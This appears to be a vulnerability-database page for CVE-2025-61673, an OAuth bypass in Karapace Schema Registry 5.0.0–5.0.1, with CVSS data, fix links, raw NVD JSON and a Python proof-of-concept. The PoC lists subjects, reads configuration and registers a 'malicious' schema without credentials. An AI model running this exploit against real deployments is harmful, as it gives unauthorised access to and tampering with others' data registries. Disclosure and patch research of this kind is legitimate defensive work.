Security Vulnerability Report
CVE-2025-61673 CVSS 8.6 HIGH

CVE-2025-61673

Published: 2025-10-03 22:15:32
Last Modified: 2026-04-15 00:35:42

Description

Karapace is an open-source implementation of Kafka REST and Schema Registry. Versions 5.0.0 and 5.0.1 contain an authentication bypass vulnerability when configured to use OAuth 2.0 Bearer Token authentication. If a request is sent without an Authorization header, the token validation logic is skipped entirely, allowing an unauthenticated user to read and write to Schema Registry endpoints that should otherwise be protected. This effectively renders the OAuth authentication mechanism ineffective. This issue is fixed in version 5.0.2.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

Karapace >= 5.0.0, < 5.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-61673 - Karapace OAuth 2.0 Authentication Bypass PoC
# This PoC demonstrates the authentication bypass by sending requests
# WITHOUT an Authorization header to protected Schema Registry endpoints.

import requests
import json

# Target Karapace Schema Registry endpoint
TARGET_URL = "http://target-karapace-host:8081"


def exploit_read_subjects():
    """
    Bypass OAuth authentication by omitting the Authorization header.
    The server skips token validation entirely when no header is present.
    """
    # Note: No Authorization header is sent - this triggers the bypass
    response = requests.get(f"{TARGET_URL}/subjects")
    if response.status_code == 200:
        print("[+] Authentication bypassed successfully!")
        print(f"[+] Retrieved subjects: {response.json()}")
        return True
    else:
        print(f"[-] Request failed with status: {response.status_code}")
        return False


def exploit_read_config(subject):
    """
    Read global or subject-level configuration without authentication.
    """
    response = requests.get(f"{TARGET_URL}/config/{subject}")
    if response.status_code == 200:
        print(f"[+] Config for {subject}: {response.json()}")
        return response.json()
    return None


def exploit_register_schema(subject, schema):
    """
    Register a malicious schema without authentication.
    """
    payload = {"schema": json.dumps(schema)}
    headers = {"Content-Type": "application/vnd.schemaregistry.v1+json"}
    # No Authorization header - bypasses OAuth validation
    response = requests.post(
        f"{TARGET_URL}/subjects/{subject}/versions",
        headers=headers,
        data=json.dumps(payload)
    )
    if response.status_code == 200:
        print(f"[+] Schema registered: {response.json()}")
        return True
    return False


if __name__ == "__main__":
    print("[*] CVE-2025-61673 - Karapace OAuth Bypass PoC")
    print("[*] Targeting:", TARGET_URL)
    print()
    # Step 1: List all subjects (unauthorized read)
    exploit_read_subjects()
    # Step 2: Read configuration
    exploit_read_config("test-subject")
    # Step 3: Register arbitrary schema (unauthorized write)
    malicious_schema = {
        "type": "record",
        "name": "MaliciousRecord",
        "fields": [{"name": "data", "type": "string"}]
    }
    exploit_register_schema("attacker-subject", malicious_schema)

References

Fix commit: https://github.com/Aiven-Open/karapace/pull/1143/commits/c4038e9ce9fa504b433d59ac2944e337292922c7
Release 5.0.2: https://github.com/Aiven-Open/karapace/releases/tag/5.0.2
GitHub Security Advisory: https://github.com/Aiven-Open/karapace/security/advisories/GHSA-vq25-vcrw-gj53

Weaknesses: CWE-288 (Authentication Bypass Using an Alternate Path or Channel), CWE-306 (Missing Authentication for Critical Function)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61673", "sourceIdentifier": "[email protected]", "published": "2025-10-03T22:15:32.213", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Karapace is an open-source implementation of Kafka REST and Schema Registry. Versions 5.0.0 and 5.0.1 contain an authentication bypass vulnerability when configured to use OAuth 2.0 Bearer Token authentication. If a request is sent without an Authorization header, the token validation logic is skipped entirely, allowing an unauthenticated user to read and write to Schema Registry endpoints that should otherwise be protected. This effectively renders the OAuth authentication mechanism ineffective. This issue is fixed in version 5.0.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}, {"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/Aiven-Open/karapace/pull/1143/commits/c4038e9ce9fa504b433d59ac2944e337292922c7", "source": "[email protected]"}, {"url": "https://github.com/Aiven-Open/karapace/releases/tag/5.0.2", "source": "[email protected]"}, {"url": "https://github.com/Aiven-Open/karapace/security/advisories/GHSA-vq25-vcrw-gj53", "source": "[email protected]"}]}}